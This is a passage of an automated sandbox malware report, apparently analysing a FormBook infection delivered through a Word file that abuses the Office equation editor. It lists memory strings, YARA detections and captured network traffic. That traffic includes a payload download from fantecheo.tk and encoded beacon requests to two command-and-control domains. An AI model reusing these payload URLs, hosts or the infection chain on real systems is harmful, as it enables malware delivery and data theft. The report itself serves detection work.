72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 63 46 35 7a 65 4
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.465106140.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.448770237.000000000838C000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.448770237.000000000838C000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp4MP&
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.434757196.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=12
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F37BA74A-2884-4D29-90C1-0C63AEE1F3DB}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: fantecheo.tk
          Source: global trafficHTTP traffic detected: GET /ibefrankszx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fantecheo.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1Host: www.personowner.guruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1Host: www.audiofactaesthetic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exeJump to dropped file
          .NET source code contains very large stringsShow sources
          Source: ibefrankszx[1].exe.2.dr, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: ibeframnk863.exe.2.dr, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 4.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 5.2.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 5.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 6.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E21F04_2_002E21F0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E4A184_2_002E4A18
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E1C284_2_002E1C28
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E4F0F4_2_002E4F0F
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D9636_2_0041D963
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00402D8B6_2_00402D8B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041E5B06_2_0041E5B0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00409E4B6_2_00409E4B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00409E506_2_00409E50
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041EE3B6_2_0041EE3B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041EF5C6_2_0041EF5C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7E0C66_2_00A7E0C6
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A830406_2_00A83040
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A9905A6_2_00A9905A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7E2E96_2_00A7E2E9
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B212386_2_00B21238
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7F3CF6_2_00A7F3CF
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00AA63DB6_2_00AA63DB
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A823056_2_00A82305
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00ACA37B6_2_00ACA37B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A873536_2_00A87353
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A914896_2_00A91489
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00AB54856_2_00AB5485
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A9C5F06_2_00A9C5F0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A8351F6_2_00A8351F
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A846806_2_00A84680
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A8E6C16_2_00A8E6C1
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B226226_2_00B22622
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A8C7BC6_2_00A8C7BC
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B0579A6_2_00B0579A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B1F8EE6_2_00B1F8EE
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00AA286D6_2_00AA286D
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A8C85C6_2_00A8C85C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A829B26_2_00A829B2
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B2098E6_2_00B2098E
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A969FE6_2_00A969FE
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B059556_2_00B05955
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B33A836_2_00B33A83
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B2CBA46_2_00B2CBA4
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B0DBDA6_2_00B0DBDA
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7FBD76_2_00A7FBD7
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00AA7B006_2_00AA7B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0E0C68_2_00A0E0C6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A3D0058_2_00A3D005
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A130408_2_00A13040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A2905A8_2_00A2905A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0E2E98_2_00A0E2E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AB12388_2_00AB1238
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0F3CF8_2_00A0F3CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A363DB8_2_00A363DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A123058_2_00A12305
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A5A37B8_2_00A5A37B
